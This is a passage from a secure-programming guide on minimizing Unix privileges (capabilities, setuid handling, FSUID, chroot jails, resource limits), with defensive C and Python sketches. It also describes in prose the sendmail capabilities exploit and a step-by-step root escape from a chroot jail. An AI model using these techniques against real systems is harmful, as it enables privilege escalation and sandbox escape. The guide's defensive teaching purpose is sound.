prune its capabilities down to just what it needs, call
|
||
prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a
|
||
non-root process.
|
||
The PR_SET_KEEPCAPS setting marks a process so that when a process does
|
||
a setuid to a nonzero value, the capabilities aren't cleared
|
||
(normally they are cleared).
|
||
This process setting is cleared on exec().
|
||
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer
|
||
versions of the Linux kernel.
|
||
</para>
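<para>
As a rough illustration of the sequence just described, here is a minimal
C sketch.
The function names are my own invention, the step that prunes the
capability sets (for example with cap_set_proc(3)) is assumed to have
happened already and is not shown, and the code assumes a Linux kernel
that supports PR_SET_KEEPCAPS.
</para>

```c
#include <grp.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <unistd.h>

/* Ask the kernel to keep the permitted capabilities across the next
 * change from uid 0 to a nonzero uid.  Returns 0 on success. */
int enable_keepcaps(void)
{
    if (prctl(PR_SET_KEEPCAPS, 1L, 0L, 0L, 0L) != 0)
        return -1;
    /* Read the flag back rather than assuming the call worked. */
    return prctl(PR_GET_KEEPCAPS, 0L, 0L, 0L, 0L) == 1 ? 0 : -1;
}

/* Hypothetical helper: switch from root to an unprivileged account while
 * keeping whatever capabilities are still in the permitted set.
 * Pruning the capability sets is assumed to have been done by the caller. */
int become_user_keeping_caps(uid_t uid, gid_t gid)
{
    if (enable_keepcaps() != 0)
        return -1;
    if (setgroups(1, &gid) != 0)   /* drop root's supplementary groups */
        return -1;
    if (setgid(gid) != 0)          /* group first, while still root */
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* The effective set is cleared by the uid change; the program must
     * raise the capabilities it needs again from the permitted set. */
    return 0;
}
```

<para>
A daemon would call become_user_keeping_caps() once, early in startup,
and treat any nonzero return value as a fatal error.
</para>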
|
||
|
||
<para>
|
||
One tool you can use to simplify minimizing granted privileges
|
||
is the ``compartment'' tool developed by SuSE.
|
||
This tool, which only works on Linux,
|
||
sets the filesystem root, uid, gid, and/or the
|
||
capability set, then runs the given program.
|
||
This is particularly handy for running some other program without
|
||
modifying it.
|
||
Here's the syntax of version 0.5:
|
||
|
||
<screen width="61">
|
||
|
||
Syntax: compartment [options] /full/path/to/program
|
||
|
||
Options:
|
||
--chroot path chroot to path
|
||
--user user change UID to this user
|
||
--group group change GID to this group
|
||
--init program execute this program before doing anything
|
||
--cap capset set capset name. You can specify several
|
||
--verbose be verbose
|
||
--quiet do no logging (to syslog)
|
||
</screen>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Thus, you could start a more secure anonymous ftp server using:
|
||
|
||
<screen width="61">
|
||
compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd
|
||
</screen>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
At the time of this writing, the tool is immature and not available on
|
||
typical Linux distributions, but this may quickly change.
|
||
You can download the program via
|
||
<ulink
|
||
url="http://www.suse.de/~marc">http://www.suse.de/~marc</ulink>.
|
||
A similar tool is dreamland; you can get that at
|
||
<ulink url="http://www.7ka.mipt.ru/~szh/dreamland">
|
||
http://www.7ka.mipt.ru/~szh/dreamland</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Note that <emphasis remap="it">not</emphasis> all Unix-like systems
|
||
implement POSIX capabilities, and PR_SET_KEEPCAPS is currently
|
||
a Linux-only extension.
|
||
Thus, these approaches limit portability.
|
||
However, if you use it merely as an optional safeguard only
|
||
where it's available, using this
|
||
approach will not really limit portability.
|
||
<!-- http://faqchest.dynhost.com/linux/KERNEL/kern-00/kern-0004/kern-000433/kern00041117_25233.html -->
|
||
<!-- http://www.linuxsecurity.com/feature_stories/kernel-24-security.html -->
|
||
Also, while the Linux kernel version 2.2 and greater includes the low-level
|
||
calls, the C-level libraries to make their use easy are not installed
|
||
on some Linux distributions, slightly complicating their use in applications.
|
||
For more information on Linux's implementation of POSIX capabilities, see
|
||
<ulink
|
||
url="http://linux.kernel.org/pub/linux/libs/security/linux-privs">http://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
FreeBSD has the jail() function for limiting privileges;
|
||
see the
|
||
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail
|
||
documentation</ulink>
|
||
for more information.
|
||
There are a number of specialized tools and extensions for limiting
|
||
privileges; see <xref linkend="unix-extensions">.
|
||
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-time-privilege-usable">
|
||
<title>Minimize the Time the Privilege Can Be Used</title>
|
||
|
||
<para>
|
||
As soon as possible, permanently give up privileges.
|
||
Some Unix-like systems, including Linux,
|
||
implement ``saved'' IDs which store the ``previous'' value.
|
||
The simplest approach is to reset
|
||
any supplemental groups if appropriate (e.g., using setgroups(2)),
|
||
and then set the other id's twice to an untrusted id.
|
||
In setuid/setgid programs, you should usually set the effective gid and uid
|
||
to the real ones, in particular right after a fork(2),
|
||
unless there's a good reason not to.
|
||
Note that you have to change the gid first when dropping from root to another
|
||
privilege or it won't work - once you drop root privileges, you won't
|
||
be able to change much else.
|
||
Note that in some systems, just setting the group isn't enough, if the
|
||
process belongs to supplemental groups with privileges.
|
||
For example, the ``rsync'' program didn't remove the supplementary groups
|
||
when it changed its uid and gid, which created a potential exploit.
|
||
<!--
|
||
Here's Mandrake's alert, I should track down the CVE entry:
|
||
http://lwn.net/alerts/Mandrake/MDKSA-2002%3A024-1.php3
|
||
-->
|
||
</para>
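<para>
Here is a minimal C sketch of a permanent drop for a setuid or setgid
program that wants to continue as its invoking user.
The function name is hypothetical, and the comment about saved ids
describes Linux behavior; check your own system's documentation.
A daemon that starts as root and switches to some other account would
also need to reset its supplementary groups with setgroups(2) before
these calls, which this sketch does not do.
</para>

```c
#include <sys/types.h>
#include <unistd.h>

/* Permanently give up any setuid/setgid privilege by setting the real,
 * effective, and saved ids to the real ids of the invoking user.
 * Returns 0 on success, -1 if anything looks wrong. */
int drop_to_real_ids(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: once the uid is dropped the process may no longer
     * be allowed to change its gid.  On Linux, setting the real id
     * through setregid()/setreuid() also resets the saved id. */
    if (setregid(rgid, rgid) != 0)
        return -1;
    if (setreuid(ruid, ruid) != 0)
        return -1;

    /* Verify the result instead of trusting the calls. */
    if (getegid() != rgid || geteuid() != ruid)
        return -1;
    return 0;
}
```

<para>
If drop_to_real_ids() returns nonzero, the safest reaction is usually to
exit immediately instead of continuing with unknown privileges.
</para>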
|
||
<!--
|
||
To call other programs from setuid programs, use a structure like this
|
||
to reduce the privileges for the child:
|
||
fork()
|
||
if child:
|
||
setgroups(...) # to set supplementary groups
|
||
setgid(getgid())
|
||
setgid(getgid()) # do it twice to eliminate saved groups
|
||
setuid(getuid())
|
||
setuid(getuid()) # do it twice to eliminate saved uids.
|
||
exec(...)
|
||
|
||
Note that this isn't appropriate for servers working on behalf of another
|
||
user, since the current gid/uid is not usually the correct one.
|
||
-->
|
||
|
||
<para>
|
||
It's worth noting that there's a well-known related bug that
|
||
uses POSIX capabilities to interfere with this minimization.
|
||
This bug affects Linux kernel 2.2.0 through 2.2.15, and possibly a number
|
||
of other Unix-like systems with POSIX capabilities.
|
||
See Bugtraq id 1322 on http://www.securityfocus.com for more information.
|
||
Here is their summary:
|
||
<blockquote><para>
|
||
POSIX "Capabilities" have recently been implemented in the Linux kernel.
|
||
These "Capabilities" are an additional form of privilege control to enable
|
||
more specific control over what privileged processes can do. Capabilities are
|
||
implemented as three (fairly large) bitfields, which each bit representing a
|
||
specific action a privileged process can perform. By setting specific bits, the
|
||
actions of privileged processes can be controlled -- access can be granted for
|
||
various functions only to the specific parts of a program that require them.
|
||
It is a security measure. The problem is that capabilities are copied with
|
||
fork() execs, meaning that if capabilities are modified by a parent process,
|
||
they can be carried over. The way that this can be exploited is by setting all
|
||
of the capabilities to zero (meaning, all of the bits are off) in each of the
|
||
three bitfields and then executing a setuid program that attempts to drop
|
||
privileges before executing code that could be dangerous if run as root, such
|
||
as what sendmail does. When sendmail attempts to drop privileges using
|
||
setuid(getuid()), it fails not having the capabilities required to do so in its
|
||
bitfields and with no checks on its return value . It continues executing with
|
||
superuser privileges, and can run a users .forward file as root leading to a
|
||
complete compromise.
|
||
</para></blockquote>
|
||
One approach, used by sendmail, is to attempt to do
|
||
setuid(0) after a setuid(getuid()); normally this should fail.
|
||
If it succeeds, the program should stop.
|
||
For more information, see
|
||
http://sendmail.net/?feed=000607linuxbug.
|
||
In the short term this might be a good idea in
|
||
other programs, though clearly the better
|
||
long-term approach is to upgrade the underlying system.
|
||
</para>
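<para>
The check described above can be sketched in C roughly as follows.
The function name is made up for illustration, and this is only one
possible way to write the test; it is not sendmail's actual code.
Note that if the check succeeds in regaining root, the process really is
root again, so the caller should stop at once.
</para>

```c
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if the process is root or can become root again,
 * 0 if root privilege appears to be permanently gone. */
int can_regain_root(void)
{
    if (getuid() == 0 || geteuid() == 0)
        return 1;                 /* never dropped, or the drop failed */
    if (seteuid(0) == 0 || setuid(0) == 0)
        return 1;                 /* something let us back in */
    return 0;
}
```

<para>
A program would call can_regain_root() right after it believes it has
dropped privileges, and call _exit(2) if the result is 1.
</para>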
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-time-privilege-active">
|
||
<title>Minimize the Time the Privilege is Active</title>
|
||
|
||
<para>
|
||
Use setuid(2), seteuid(2), setgroups(2),
|
||
and related functions to ensure that the program
|
||
only has these privileges active when necessary,
|
||
and then temporarily deactivate the privilege when it's not in use.
|
||
As noted above, you might want to ensure that these privileges are disabled
|
||
while parsing user input, but more generally, only turn on privileges when
|
||
they're actually needed.
|
||
</para>
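<para>
A minimal C sketch of this on/off pattern follows.
The three function names are hypothetical, and the sketch only handles
the user id; a setgid program would treat the group id the same way with
setegid(2).
</para>

```c
#include <sys/types.h>
#include <unistd.h>

static uid_t privileged_euid;   /* effective uid the program started with */

/* Call once at startup: remember the privileged id, then switch the
 * effective uid to the real uid so privilege is off by default. */
int privilege_init(void)
{
    privileged_euid = geteuid();
    return seteuid(getuid());
}

/* Re-enable the privilege just before the operation that needs it. */
int privilege_on(void)
{
    return seteuid(privileged_euid);
}

/* Disable it again immediately afterwards. */
int privilege_off(void)
{
    return seteuid(getuid());
}
```

<para>
Each call returns 0 on success; the caller should check every return
value, and keep the code between privilege_on() and privilege_off() as
short as it can.
</para>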
|
||
|
||
<para>
|
||
Note that some buffer overflow attacks, if successful, can force a program
|
||
to run arbitrary code, and that code could re-enable privileges that were
|
||
temporarily dropped.
|
||
Thus, there are <emphasis>many</emphasis>
|
||
attacks that temporarily deactivating a privilege won't counter -
|
||
it's always much better to completely drop privileges as soon as possible.
|
||
There are many papers that describe how attack code can re-enable such privileges, such as
|
||
<ulink url="http://www.enderunix.org/docs/en/sc-en.txt">"Designing
|
||
Shellcode Demystified"</ulink>.
|
||
Some people even claim that ``seteuid() [is] considered harmful'' because
|
||
of the many attacks it doesn't counter.
|
||
Still, temporarily deactivating these permissions
|
||
prevents a whole class of attacks,
|
||
such as techniques to convince a program to write into a file that
|
||
perhaps it didn't intend to write into.
|
||
Since this technique prevents many attacks,
|
||
it's worth doing if permanently dropping the privilege can't be done
|
||
at that point in the program.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-privileged-modules">
|
||
<title>Minimize the Modules Granted the Privilege</title>
|
||
|
||
<para>
|
||
If only a few modules are granted the privilege, then it's much
|
||
easier to determine if they're secure.
|
||
One way to do so is to have a single module use the
|
||
privilege and then drop it, so that other modules called later cannot misuse
|
||
the privilege.
|
||
Another approach is to have separate commands in separate
|
||
executables; one command might be a complex
|
||
tool that can do a vast number of tasks for a privileged user (e.g., root),
|
||
while the other tool is setuid but is a small, simple tool that
|
||
only permits a small command subset (and does not trust its invoker).
|
||
The small, simple tool checks to see if the input meets various criteria for
|
||
acceptability, and then if it determines the input is acceptable, it
|
||
passes the data on to the complex tool.
|
||
Note that the small, simple tool must do a thorough job checking its inputs
|
||
and limiting what it will pass along to the complex tool, or this can
|
||
be a vulnerability.
|
||
The communication could be via shell invocation, or any IPC mechanism.
|
||
These approaches can even be layered several ways, for example,
|
||
a complex user tool could call a simple setuid
|
||
``wrapping'' program (that checks its inputs for secure values)
|
||
that then passes on information to another complex trusted tool.
|
||
</para>
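<para>
To make the ``small, simple tool'' idea concrete, here is a minimal C
sketch of such a wrapper's core.
Everything specific in it is an assumption for illustration: the list of
permitted subcommands, the function names, and the path /usr/sbin/bigtool
are all invented.
</para>

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical list of subcommands the wrapper is willing to forward. */
static const char *const allowed_commands[] = { "status", "rotate-logs" };

/* Returns 1 only for an exact match against the list above. */
int command_is_allowed(const char *cmd)
{
    size_t i;

    if (cmd == NULL)
        return 0;
    for (i = 0; i < sizeof allowed_commands / sizeof allowed_commands[0]; i++)
        if (strcmp(cmd, allowed_commands[i]) == 0)
            return 1;
    return 0;
}

/* Run the complex tool with one vetted argument and a fixed environment.
 * Returns -1 without executing anything if the request is rejected;
 * on success it does not return.  The tool's path is a made-up example. */
int forward_command(const char *cmd)
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    char *argv[3];

    if (!command_is_allowed(cmd))
        return -1;
    argv[0] = "bigtool";
    argv[1] = (char *)cmd;
    argv[2] = NULL;
    execve("/usr/sbin/bigtool", argv, envp);
    return -1;                    /* execve failed */
}
```

<para>
The wrapper accepts only exact matches, passes nothing through a shell,
and replaces the caller's environment, so the complex tool never sees
text that the wrapper has not vetted.
</para>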
|
||
|
||
<para>
|
||
This approach is the normal approach for developing GUI-based applications
|
||
which require privilege, but must be run by unprivileged users.
|
||
The GUI portion is run as a normal unprivileged user process;
|
||
that process then passes security-relevant requests on to another process
|
||
that has the special privileges (and does not trust the first process, but
|
||
instead limits the requests to whatever the user is allowed to do).
|
||
Never develop a program that is
|
||
privileged (e.g., using setuid) and also directly invokes a graphical toolkit:
|
||
Graphical toolkits aren't designed to be used this way, and it would be
|
||
extremely difficult to audit graphical toolkits
|
||
in a way to make this possible.
|
||
Fundamentally, graphical toolkits must be large, and it's extremely
|
||
unwise to place so much faith in the perfection of that much code, so
|
||
there is no point in trying to make them do what should never be done.
|
||
Feel free to create a small setuid program that invokes two separate programs:
|
||
one without privileges (but with the graphical interface), and one with
|
||
privileges (and without an external interface).
|
||
Or, create a small setuid program that can be invoked by the unprivileged
|
||
GUI application.
|
||
But never combine the two into a single process.
|
||
For more about this, see the statement by
|
||
<ulink url="http://www.gtk.org/setuid.html">Owen Taylor about GTK
|
||
and setuid, discussing why GTK_MODULES is not a security hole</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Some applications can be best developed by dividing the problem
|
||
into smaller, mutually untrusting programs.
|
||
A simple way is to divide up the problem into separate programs that
|
||
do one thing (securely), using the filesystem and locking to
|
||
prevent problems between them.
|
||
If more complex interactions are needed, one approach is to
|
||
fork into multiple processes, each of which has different privilege.
|
||
Communications channels can be set up in a variety of ways; one
|
||
way is to have a "master" process create communication channels
|
||
(say unnamed pipes or unnamed sockets),
|
||
then fork into different processes and have each process
|
||
drop as many privileges as possible.
|
||
If you're doing this, be sure to watch for deadlocks.
|
||
Then use a simple protocol to allow the less trusted processes
|
||
to request actions from the more trusted process(es), and ensure that the more
|
||
trusted processes only support a limited set of requests.
|
||
Setting user and group permissions so that no one else can even start
|
||
up the sub-programs makes them harder to break into.
|
||
</para>
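<para>
The master-process arrangement described above might look something like
the following C sketch.
It is deliberately tiny: the request names and function names are
invented, only one request is exchanged, and the actual dropping of
privileges in the less trusted process is left as a comment.
</para>

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The only requests the trusted side will act on (made-up names). */
static int request_is_supported(const char *req)
{
    return strcmp(req, "GET_STATUS") == 0 || strcmp(req, "RELOAD") == 0;
}

/* Trusted side: read one request, answer "OK" or "DENIED". */
static void serve_one_request(int fd)
{
    char buf[64];
    ssize_t n = read(fd, buf, sizeof buf - 1);
    const char *reply = "DENIED";

    if (n > 0) {
        buf[n] = '\0';
        if (request_is_supported(buf))
            reply = "OK";   /* a real helper would do the work here */
    }
    (void)write(fd, reply, strlen(reply));
}

/* Create the channel, fork, and exchange a single request.
 * Returns 0 and fills reply on success, -1 on error. */
int ask_trusted_helper(const char *request, char *reply, size_t reply_size)
{
    int sv[2];
    pid_t pid;
    ssize_t n;

    if (reply_size == 0 || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }
    if (pid == 0) {               /* child: the more trusted process */
        close(sv[0]);
        serve_one_request(sv[1]);
        _exit(0);
    }
    /* Parent: the less trusted process.  A real program would drop its
     * privileges permanently here, before touching any outside input. */
    close(sv[1]);
    n = write(sv[0], request, strlen(request));
    if (n > 0)
        n = read(sv[0], reply, reply_size - 1);
    close(sv[0]);
    waitpid(pid, NULL, 0);
    if (n <= 0)
        return -1;
    reply[n] = '\0';
    return 0;
}
```

<para>
Because each side does exactly one write followed by one read (or the
reverse), this exchange cannot deadlock; a longer-lived protocol needs
more care.
</para>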
|
||
|
||
<para>
|
||
Some operating systems have the concept of multiple
|
||
layers of trust in a single process, e.g., Multics' rings.
|
||
Standard Unix and Linux don't have a way of separating multiple levels of trust
|
||
by function inside a single process
|
||
like this; a call to the kernel increases privileges,
|
||
but otherwise a given process has a single level of trust.
|
||
This is one area where technologies like Java 2, C# (which copies
|
||
Java's approach), and
|
||
Fluke (the basis of security-enhanced Linux) have an advantage.
|
||
For example,
|
||
Java 2 can specify fine-grained permissions such as the permission to
|
||
only open a specific file.
|
||
However, general-purpose operating systems do not typically
|
||
have such abilities at this time; this may change in the near future.
|
||
For more about Java, see <xref linkend="java">.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="consider-fsuid">
|
||
<title>Consider Using FSUID To Limit Privileges</title>
|
||
|
||
<para>
|
||
Each Linux process has two Linux-unique state values called
|
||
filesystem user id (FSUID) and filesystem group id (FSGID).
|
||
These values are used when checking against the filesystem permissions.
|
||
If you're building a program that operates as a file server for arbitrary
|
||
users (like an NFS server), you might consider using these Linux extensions.
|
||
To use them, while holding root privileges change
|
||
just FSUID and FSGID before accessing files on behalf of a normal user.
|
||
This extension is fairly useful, and provides a mechanism for limiting
|
||
filesystem access rights without removing other (possibly necessary) rights.
|
||
By only setting the FSUID (and not the EUID), a local user cannot send
|
||
a signal to the process.
|
||
Also, avoiding race conditions is much easier in this situation.
|
||
However, a disadvantage of this approach
|
||
is that these calls are not portable to other Unix-like systems.
|
||
</para>
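<para>
Here is a minimal, Linux-only C sketch of switching just the filesystem
ids.
The function name is hypothetical.
Since setfsuid(2) and setfsgid(2) return the previous id and do not
report errors, the sketch checks each change with a second call.
</para>

```c
#include <sys/fsuid.h>
#include <sys/types.h>
#include <unistd.h>

/* Switch only the filesystem ids.  Each change is verified by calling
 * the same function again with -1, which never changes anything and
 * returns the id currently in effect.  Returns 0 on success. */
int set_fs_ids(uid_t uid, gid_t gid)
{
    setfsgid(gid);
    if ((gid_t)setfsgid((gid_t)-1) != gid)
        return -1;
    setfsuid(uid);
    if ((uid_t)setfsuid((uid_t)-1) != uid)
        return -1;
    return 0;
}
```

<para>
A file server running as root might call set_fs_ids() with the client's
ids before opening a file and restore its own ids afterwards.
Keep in mind that the process's supplementary groups still take part in
permission checks, so they may need attention too.
</para>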
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="consider-chroot">
|
||
<title>Consider Using Chroot to Minimize Available Files</title>
|
||
|
||
<para>
|
||
You can use chroot(2) to limit the files visible to your program.
|
||
This requires carefully setting up a directory (called the ``chroot jail'')
|
||
and correctly entering it.
|
||
This can be a fairly effective technique for improving a program's
|
||
security - it's hard to interfere with files you can't see.
|
||
However, it depends on a whole bunch of assumptions, in particular,
|
||
the program must lack root privileges, it must not have any way to get
|
||
root privileges, and the chroot jail must be properly set up
|
||
(e.g., be careful what you put inside the chroot jail, and make sure that
|
||
users can never control its contents before calling chroot).
|
||
I recommend using chroot(2) where it makes sense to do so, but don't depend
|
||
on it alone; instead, make it part of a layered set of defenses.
|
||
Here are a few notes about the use of chroot(2):
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
The program can still use non-filesystem objects that are shared
|
||
across the entire machine
|
||
(such as System V IPC objects and network sockets).
|
||
It's best to also
|
||
use separate pseudo-users and/or groups, because all Unix-like systems include
|
||
the ability to isolate users; this will at least limit the damage
|
||
a subverted program can do to other programs.
|
||
Note that most current Unix-like systems (including Linux)
|
||
won't isolate intentionally cooperating programs; if you're worried about
|
||
malicious programs cooperating, you need to get a system that implements
|
||
some sort of mandatory access control and/or limits covert channels.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Be sure to close any file descriptors to outside files if you
|
||
don't want them used later.
|
||
In particular, don't have any descriptors open to directories outside
|
||
the chroot jail, or set up a situation where such a descriptor could be
|
||
given to it (e.g., via Unix sockets or an old implementation of /proc).
|
||
If the program is given a descriptor to a directory outside the chroot jail,
|
||
it could be used to escape out of the chroot jail.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
The chroot jail has to be set up to be secure - it must never be
|
||
controlled by a user and every file added must be carefully examined.
|
||
Don't use a normal user's home directory, subdirectory, or
|
||
other directory that can ever be controlled by a user as a chroot jail;
|
||
use a separate directory specially set aside
|
||
for the purpose.
|
||
<!-- http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/64/1/1/2.html -->
|
||
<!--
|
||
http://marc.theaimsgroup.com/?l=qmail&m=100128344722211&w=2
|
||
-->
|
||
Using a directory controlled by a user is a disaster - for example,
|
||
the user could create a ``lib'' directory containing a trojaned linker or libc
|
||
(and could link a setuid root binary into that space, if the files you
|
||
save don't use it).
|
||
Place the absolute minimum number of files and directories there.
|
||
Typically you'll have a /bin, /etc/, /lib, and maybe one or two others
|
||
(e.g., /pub if it's an ftp server).
|
||
Place in /bin only what you need to run after doing the chroot(); sometimes
|
||
you need nothing at all (try to avoid placing a shell like /bin/sh
|
||
there, though sometimes that can't be helped).
|
||
You may need a /etc/passwd and /etc/group so file listings can show
|
||
some correct names, but if so, try not to include the real system's
|
||
values, and certainly replace all passwords with "*".
|
||
</para>
|
||
|
||
<para>
|
||
In /lib, place only what you need; use ldd(1) to query each program in /bin
|
||
to find out what it needs, and include only those libraries.
|
||
On Linux, you'll probably need a few basic libraries like ld-linux.so.2, and
|
||
not much else.
|
||
Alternatively, recompile any necessary programs to be statically linked,
|
||
so that they
|
||
don't need dynamically loaded libraries at all.
|
||
</para>
|
||
|
||
<para>
|
||
It's usually wiser to completely copy in all files, instead of making
|
||
hard links; while this wastes some time and disk space, it makes it so that
|
||
attacks on the chroot jail files do not automatically propagate into the
|
||
regular system's files.
|
||
Mounting a /proc filesystem, on systems where this is supported, is
|
||
generally unwise. In fact, in very old versions of Linux (versions 2.0.x,
|
||
at least up through 2.0.38) it's a
|
||
known security flaw, since there are pseudo-directories in /proc that
|
||
would permit a chroot'ed program to escape.
|
||
Linux kernel 2.2 fixed this known problem, but there may be others; if
|
||
possible, don't do it.
|
||
</para>
|
||
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Chroot really isn't effective if
|
||
the program can acquire root privilege.
|
||
For example, the program could use calls like mknod(2) to create a device
|
||
file that can view physical memory, and then use the resulting
|
||
device file to modify kernel memory to give itself
|
||
whatever privileges it desired.
|
||
Another example of how a root program can break out of chroot
|
||
is demonstrated at
|
||
<ulink
|
||
url="http://www.suid.edu/source/breakchroot.c">http://www.suid.edu/source/breakchroot.c</ulink>.
|
||
In this example, the program opens a file descriptor for
|
||
the current directory, creates and chroots into a subdirectory, sets
|
||
the current directory to the previously-opened current directory,
|
||
repeatedly cd's up from the current directory (which since it is
|
||
outside the current chroot succeeds in moving up to the real filesystem
|
||
root), and then calls chroot on the result.
|
||
By the time you read this, these weaknesses may have been plugged,
|
||
but the reality is that root privilege has traditionally meant ``all
|
||
privileges'' and it's hard to strip them away.
|
||
It's better to assume that a program requiring continuous root privileges
|
||
will only be mildly helped using chroot().
|
||
Of course, you may be able to break your program into parts, so that
|
||
at least part of it can be in a chroot jail.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
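<para>
As a rough illustration of the ordering described in the list above, the
following Python sketch closes inherited descriptors, enters the jail, and
only then gives up root privilege.
The function names (close_descriptors, enter_jail) and the use of Python
are assumptions made for this example; the os calls are the standard
wrappers around close(2), chroot(2), chdir(2), setgroups(2), setgid(2),
and setuid(2).
enter_jail() must be run as root, so treat it as a sketch under those
assumptions rather than a complete recipe.
</para>

```python
import os


def close_descriptors(first=3, last=None, keep=()):
    """Close every descriptor in [first, last) that is not listed in keep."""
    if last is None:
        last = os.sysconf("SC_OPEN_MAX")
    for fd in range(first, last):
        if fd in keep:
            continue
        try:
            os.close(fd)
        except OSError:
            pass  # this descriptor was not open


def enter_jail(jail_dir, uid, gid):
    """Confine the calling (root) process to jail_dir, then give up root."""
    close_descriptors()   # keep no descriptor to anything outside the jail
    os.chroot(jail_dir)   # requires root privilege
    os.chdir("/")         # make sure the working directory is inside the jail
    os.setgroups([])      # drop supplementary groups while still root
    os.setgid(gid)        # drop the group id before the user id
    os.setuid(uid)        # permanently give up root
```

<para>
A caller might invoke enter_jail() with a directory set aside for the
purpose and the ids of a dedicated unprivileged account; which directory
and account to use depends on the installation.
</para>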
|
||
|
||
</sect2>
|
||
<sect2 id="minimize-accessible-data">
|
||
<title>Consider Minimizing the Accessible Data</title>
|
||
|
||
<para>
|
||
Consider minimizing the amount of data that can be accessed by the user.
|
||
For example, in CGI scripts, place all data used by the CGI script
|
||
outside of the document tree unless there is a reason the user needs to
|
||
see the data directly.
|
||
Some people have the false notion that, by not publicly providing a
|
||
link, no one can access the data, but this is simply not true.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-resources">
|
||
<title>Consider Minimizing the Resources Available</title>
|
||
<para>
|
||
Consider minimizing the computer resources available to a given
|
||
process so that, even if it ``goes haywire,'' its damage can be limited.
|
||
This is a fundamental technique for preventing a denial of service.
|
||
For network servers,
|
||
a common approach is to set up a separate process for each session,
|
||
and for each process limit the amount of CPU time (et cetera) that session
|
||
can use.
|
||
That way, if an attacker makes a request that chews up memory or uses
|
||
100% of the CPU, the limits will kick in and prevent that single session
|
||
from interfering with other tasks.
|
||
Of course, an attacker can establish many sessions, but this at least
|
||
raises the bar for an attack.
|
||
See <xref linkend="quotas"> for more information on how to set these limits
|
||
(e.g., ulimit(1)).
|
||
</para>
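<para>
The per-session limits described above might be sketched as follows.
This is only an illustration in Python: run_session() and its default
values are hypothetical, and the limits chosen (CPU time and number of
open files) are examples of what a server could restrict.
The calls used are the standard resource.getrlimit()/setrlimit()
wrappers around getrlimit(2) and setrlimit(2).
</para>

```python
import resource
import subprocess


def _cap(which, wanted):
    """Set the soft and hard limit to wanted, never above the inherited hard limit."""
    _soft, hard = resource.getrlimit(which)
    if hard != resource.RLIM_INFINITY:
        wanted = min(wanted, hard)
    resource.setrlimit(which, (wanted, wanted))


def run_session(argv, cpu_seconds=10, open_files=256):
    """Run argv as a separate process with its own resource limits."""
    def apply_limits():
        # Runs in the child after fork() and before exec(), so the
        # limits apply to this one session only.
        _cap(resource.RLIMIT_CPU, cpu_seconds)
        _cap(resource.RLIMIT_NOFILE, open_files)

    return subprocess.run(argv, preexec_fn=apply_limits,
                          capture_output=True, text=True)
```

<para>
Because both the soft and the hard limit are lowered, the session
cannot raise them again; the parent process keeps its own limits.
</para>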
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="minimize-functionality">
|
||
<title>Minimize the Functionality of a Component</title>
|
||
<para>
|
||
In a related move, minimize the amount of functionality provided by
|
||
your component.
|
||
If it does several functions, consider breaking its implementation up into
|
||
those smaller functions.
|
||
That way, users who don't need some functions can disable just those portions.
|
||
This is particularly important when a flaw is discovered - this way, users
|
||
can disable just one component and still use the other parts.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-setuid">
|
||
<title>Avoid Creating Setuid/Setgid Scripts</title>
|
||
<para>
|
||
Many Unix-like systems, in particular Linux, simply ignore the
|
||
setuid and setgid bits on scripts to avoid the race condition
|
||
described earlier.
|
||
Since support for setuid scripts varies on Unix-like systems,
|
||
they're best avoided in new applications where possible.
|
||
As a special case, Perl includes a special setup to support setuid Perl
|
||
scripts, so using setuid and setgid is acceptable in Perl if you
|
||
truly need this kind of functionality.
|
||
If you need to support this kind of functionality in your own
|
||
interpreter, examine how Perl does this.
|
||
Otherwise, a simple approach is to ``wrap'' the script with a small
|
||
setuid/setgid executable that creates a safe environment
|
||
(e.g., clears and sets environment variables) and then
|
||
calls the script (using the script's full path).
|
||
Make sure that the script cannot be changed by an attacker!
|
||
Shell scripting languages have additional problems, and really should
|
||
not be setuid/setgid; see <xref linkend="shell">
|
||
for more information about this.
|
||
</para>
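<para>
The logic of such a wrapper can be sketched as below.
Note the assumptions: a real wrapper has to be a small compiled
executable (a Python file is itself a script, so its setuid bit would
be ignored on Linux), and the names SAFE_PATH, PASS_THROUGH,
safe_environment(), and run_script() are invented for this example.
The point is only the order of steps: build a fresh environment from an
allow-list, insist on a full path, then execute the script.
</para>

```python
import os

SAFE_PATH = "/usr/bin:/bin"      # assumed set of trusted directories
PASS_THROUGH = ("TZ", "LANG")    # hypothetical allow-list of variables


def safe_environment(inherited):
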